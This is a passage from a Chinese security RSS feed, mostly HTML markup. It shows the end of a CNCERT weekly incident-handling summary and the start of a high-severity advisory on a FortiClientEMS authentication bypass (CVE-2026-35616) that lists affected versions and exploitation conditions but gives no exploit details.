src="https://wechat2rss.xlab.app/img-proxy/?k=cfea0f72&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FaoXpXT1UJRjUJfUa7eAYdRtIibibSB6R8DCrl7Jibk9YYriamVrZj802LxpP3RXkJRjLAwEoNsNOunKwqGhUQCdghkDuHc1EJ1YlXFZmhlbvEAU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="margin-bottom: 0px;outline: 0px;white-space: normal;color: rgb(0, 0, 0);font-size: medium;text-align: start;background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.48px;"><div style="margin-top: 10px;margin-bottom: 10px;outline: 0px;"><div style="outline: 0px;background-image: -webkit-linear-gradient(left, rgb(30, 155, 232), rgb(255, 255, 255));background-color: rgb(30, 155, 232);"><div style="padding: 10px;outline: 0px;border-width: 0px 0px 0px 10px;border-style: solid;border-left-color: rgb(252, 180, 43);display: inline-block;"><div style="outline: 0px;color: rgb(255, 255, 255);"><p style="outline: 0px;font-size: 16px;"><span style="outline: 0px;font-size: 15px;"><span leaf="">本周事件处理情况</span></span></p></div></div></div></div></div><p style="margin-bottom: 16px;outline: 0px;white-space: normal;color: rgb(0, 0, 0);font-size: medium;text-align: justify;background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.5em;text-indent: 2em;letter-spacing: 0.54px;"><span style="outline: 0px;color: rgb(0, 128, 255);font-size: 14px;letter-spacing: 0.54px;text-indent: 2em;"><p><span leaf="">本周，CNCERT协调云服务商、域名注册服务机构、应用商店、各省分中心以及国际合作组织共处理网络安全事件248起，含跨境网络安全事件56起。其中，协调境内外域名注册机构、境外CERT等机构重点处理151起仿冒投诉事件。协调5个提供恶意移动应用程序下载服务的平台开展移动互联网恶意代码处理工作，共处理传播移动互联网恶意代码的恶意URL链接5个。</span></p></span></p><div style="margin-bottom: 0px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.48px;"><div style="outline: 0px;text-align: center;"><div style="padding-right: 8px;padding-left: 8px;outline: 0px;height: 40px;color: rgb(255, 255, 255);line-height: 40px;font-size: 16px;display: inline-block;background-color: rgb(79, 129, 189);"><p style="outline: 0px;"><span style="outline: 0px;font-size: 14px;"><span leaf="">近期回顾</span></span></p></div></div></div><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501447&amp;idx=1&amp;sn=0f80ca1d770f552e908dbf28df485e07&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第15期（4月6日-4月12日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第15期（4月6日-4月12日）</a></span></span></span></span></span></span></span></span></span></p><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;letter-spacing: 0.54px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501406&amp;idx=1&amp;sn=f2e30d65d7bacb2eae51bde67d6b1ed8&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第14期（3月30日-4月5日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第14期（3月30日-4月5日）</a></span></span></span></span></span></span></span></span></span></p><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;letter-spacing: 0.54px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501384&amp;idx=1&amp;sn=8ab76f1f0a1e754606422e898e1612d5&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第13期（3月23日-3月29日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第13期（3月23日-3月29日）</a></span></span></span></span></span></span></span></span></span></p><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;letter-spacing: 0.54px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501366&amp;idx=1&amp;sn=b260af0c80744f40044ba99b0d841792&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第12期（3月16日-3月22日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第12期（3月16日-3月22日）</a></span></span></span></span></span></span></span></span></span></p><p style="margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.54px;"><span style="outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;"><span style="outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 10px;margin-bottom: 10px;outline: 0px;white-space: normal;color: rgb(34, 34, 34);background-color: rgb(255, 255, 255);font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;letter-spacing: 0.54px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;text-decoration: underline;color: rgb(121, 123, 170);font-size: 12px;letter-spacing: 1px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;line-height: 19.2px;min-height: 0px;background-image: none;background-clip: border-box;background-position: 0% 0%;background-repeat: repeat;background-size: auto;border-width: 0px;border-style: none;border-color: rgb(121, 123, 170);bottom: auto;height: auto;left: auto;max-height: none;min-width: 0px;text-decoration: none;text-decoration-style: solid;text-decoration-color: rgb(121, 123, 170);top: auto;z-index: auto;visibility: visible;clear: none;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;outline: 0px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="outline: 0px;"><span style="outline: 0px;"><span style="outline: 0px;"><span leaf="">●</span></span></span></span><span style="outline: 0px;color: rgb(121, 123, 170);"><span style="outline: 0px;-webkit-tap-highlight-color: rgba(0, 0, 0, 0);cursor: pointer;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIwNDk0MDgxMw==&amp;mid=2247501338&amp;idx=1&amp;sn=66aa356734dfb5c7a086817e03aca355&amp;scene=21#wechat_redirect" textvalue="网络安全信息与动态周报2026年第11期（3月9日-3月15日）" data-itemshowtype="0" linktype="text" data-linktype="2">网络安全信息与动态周报2026年第11期（3月9日-3月15日）</a></span></span></span></span></span></span></span></span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=66f8eccc&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525409%26idx%3D4%26sn%3D44e552e0b424ae3cdd85d3563499791a">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 24 Apr 2026 20:29:00 +0800</pubDate>
    </item>
    <item>
      <title>【漏洞通告】FortiClientEMS绕过认证漏洞(CVE-2026-35616)</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525367&amp;idx=1&amp;sn=e73780f0f75d9788028f066f5abdcb82</link>
      <description>2026年4月21日，FortiClient-Enterprise-Management-Server组件披露绕过认证漏洞，漏洞编号：CVE-2026-35616，漏洞威胁等级：高危。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-04-22 15:32</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=edcbc1ff&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FAPc6NwjLsxSAankqHln3JtDZDKHict4MCTMMznFLiabTuCZubcwexWnbdCcLoVcPRFboQicRlpY2icICv3tl48gHARHeF51kENL5ZcjlNnYP3TM%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年4月21日，FortiClient-Enterprise-Management-Server组件披露绕过认证漏洞，漏洞编号：CVE-2026-35616，漏洞威胁等级：高危。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041713" src="https://wechat2rss.xlab.app/img-proxy/?k=e1cd6553&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxRMe8KcKH1kTic3ut7bABJLQLvibCTzw3yBf9HrpteHEXiaabdCjOuuTMhHUBOVeZWMyViaoUUAzAzvbCGcU8yHibAe06siaf12Vc3ck%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FortiClientEMS绕过认证漏洞(CVE-2026-35616)</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">组件名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FortiClient-Enterprise-Management-Server</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">7.4.5≤ FortiClientEMS ≤7.4.6</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞类型：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绕过认证</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">利用条件：</span></strong></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、用户认证：无需用户认证</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、前置条件：默认配置</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3、触发方式：远程</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">综合评价：</span></span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定利用难度&gt;：容易，无需授权即可泄露敏感信息。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定威胁等级&gt;：高危，可造成信息泄露。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">官方解决方案：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已发布</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041712" src="https://wechat2rss.xlab.app/img-proxy/?k=08e9f52e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxT62yfvQqKL0U2Edx4Y3p1KnQRsjkMRvoxibP7tCeSXicsJlyUTlQpfrEp639dtv4iaPWuod3bLvibCmicGojf7uvX1SfkNicia2APWpM%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">组件介绍</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span 